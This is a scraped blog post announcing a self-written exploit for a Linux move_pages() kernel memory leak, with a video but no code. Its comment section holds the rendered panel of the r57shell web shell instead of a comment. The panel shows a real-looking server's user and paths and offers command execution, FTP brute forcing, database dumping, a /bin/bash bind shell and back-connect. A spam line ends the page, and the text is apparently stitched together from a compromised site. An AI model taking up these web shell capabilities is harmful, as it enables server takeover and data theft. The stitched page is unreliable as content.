Kernel Bench

Kernel News and How To

10
Mar

Linux 2.6.18+ move_pages() Infoleak Exploit

by admin
Redhat Kernel

Quick video of an exploit I wrote for the move_pages() infoleak just submitted to oss-sec (though I had noticed the commit earlier today with SuSE security on CC ;) ). The analysis and exploit development were all completed within an hour. I can leak 512MB of kernel memory around a specific bitmap in the kernel. I demonstrate the leaking of the contents of two sysctl variables in the exploit, as well as the NUMA bitmap.

Source code will be released shortly — it’s a neat little bug, and I like the idea of deducing kernel memory one bit at a time via the return value of the system call ;)

PS: SELinux did nothing to prevent this exploit ;)

Duration : 0:6:30


Technorati Tags: , , , ,

1 Comment
, , , ,
1025

One Comment

r57shell 404 Not Found

404 Not Found

The server can not find the requested page:

127.0.0.1/r57shell/version.php?version=124 (port 80)

Please forward this error screen to 127.0.0.1's WebMaster.

   !  r57shell 1.24   07-02-2012 23:40:05  [ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]
  safe_mode: OFF  PHP version: 5.2.17  cURL: ON  MySQL: ON  MSSQL: OFF  PostgreSQL: ON  Oracle: OFF
  Disable functions : NONE
  HDD Free : 340.94 GB HDD Total : 802.94 GB
uname -a : 
sysctl : 
$OSTYPE : 
Server : 
id : 
pwd : 
   Linux useast6.myserverhosts.com 2.6.18-338.5.1.el5.lve0.8.29 #1 SMP Sat Apr 23 01:52:48 EEST 2011 x86_64 x86_64 x86_64 G
   -
   linux-gnu
   Apache
   uid=1610(kernelx7) gid=1598(kernelx7) groups=1598(kernelx7)
   /home/kernelx7/public_html   ( drwxr-x--- )
Executed command: ls -lia
:: Execute command on server  ::
Run command ?
Work directory ?    
:: Edit files  ::
File for edit ?    
:: Aliases  ::
         Select alias ?        
:: Find text in files  ::
Find text ?    
In dirs ? * ( /root;/home;/tmp )
Only in files ?* ( .txt;.php;.htm )
:: Search text in files via find  ::
Text for find ?    
Find in folder ? * ( /root;/home;/tmp )
Find in files ? * you can use regexp
:: Eval PHP code  ::

 
:: Upload files on server  ::
Local file ?
 New name ?    
:: Upload files from remote server  ::
With ?  Remote file ?
Local file ?    
:: Download files from server  ::
file ?    
Archivation ? without archivation zip gzip bzip
:: FTP  ::
Download files from remote ftp-server
FTP-server:port ?
Login ?
Password ?
File on ftp ?
Local file ?
Transfer mode ?
Send file to remote ftp server
FTP-server:port ?
Login ?
Password ?
Local file ?
File on ftp ?
Transfer mode ?
:: FTP-bruteforce  ::
FTP-server:port ?    
* use username from /etc/passwd for ftp login and password ( Users list )
Use reverse (user -> resu) login for password
:: Mail  ::
Send email
To ?
From ?
Subj ?
Mail ?
Send file to email
To ?
From ?
Subj ?
Local file ?
Archivation ? without archivation zip gzip bzip
:: Databases  ::
Show database structure
Type ?
Port ?
Login ?
Password ?
show tables ?
show columns ?
Dump database table
Type ?
Port ?
Login ?
Password ?
Database ?
Table ?
Save dump in file ?
file ?
Run SQL query
Type ?
Port ?
Login ?
Password ?
Database ?
SQL query ?

:: Net  ::
Bind port to /bin/bash
Port ?
Password for access ?
Use ?
back-connect
IP ?
Port ?
Use ?
datapipe
Local port ?
Remote host ?
Remote port ?
Use ?
o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.24 ]---o

 WP Glamour
Kernel Bench is proudly powered by WordPress
Entries (RSS) and Comments (RSS).

192.168.1.1
100 mg viagra